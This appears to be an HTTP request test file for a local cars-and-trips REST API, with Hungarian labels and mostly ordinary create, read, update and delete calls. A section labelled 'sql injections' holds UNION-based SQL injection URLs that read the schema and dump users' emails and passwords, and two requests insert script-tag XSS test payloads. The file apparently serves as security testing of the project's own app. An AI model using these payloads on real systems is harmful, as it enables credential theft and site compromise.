### get cars
get http://localhost:3000/cars

### get car by id
get http://localhost:3000/cars/602

### sql injections
### get adabázis
get http://localhost:3000/cars/1  UNION SELECT database(), '', '', ''

### get táblák nevei
get http://localhost:3000/cars/1  union select table_name, '','', '' from information_schema.tables where table_schema='cars'

### users tábla oszlopai
get http://localhost:3000/cars/1 union select column_name, '', '', data_type from information_schema.columns where table_name='users' and table_schema='cars'


### get user adatok
get http://localhost:3000/cars/1 union select email, password, '','' from users

### delte car by id
delete http://localhost:3000/cars/1

### post car
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "Mercedes",
    "licenceNumber": "MM-111",
    "hourlyRate": 2500
}

### post car XSS teszt
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "X Mercedes <script>alert('betörtem')</script>",
    "licenceNumber": "MM-111 <script>alert('betörtem')</script>",
    "hourlyRate": "2500  <script>alert('betörtem')</script>"
}

### put car by id
put http://localhost:3000/cars/4
Content-Type: application/json

{
    "name": "Mercedes2",
    "licenceNumber": "MM-222",
    "hourlyRate": 2600
}

### put car by id XSS teszt
put http://localhost:3000/cars/11
Content-Type: application/json

{
    "name": "XY Mercedes <script>alert('betörtem')</script>",
    "licenceNumber": "YM-111 <script>alert('betörtem')</script>",
    "hourlyRate": "2600  <script>alert('betörtem')</script>"
}

### get trips by carId
get http://localhost:3000/tripsByCarId/1

### get trips by id
get http://localhost:3000/trips/56

### get trips
get http://localhost:3000/trips

### post trip
post http://localhost:3000/trips
Content-Type: application/json

{
    "numberOfMinits": 56,
    "date": "2022.10.13 01:36:00",
    "carId": 3
}


### put trip by id
put http://localhost:3000/trips/56
Content-Type: application/json

{
    "numberOfMinits": 55,
    "date": "2022.10.13 01:35:00",
    "carId": 2
}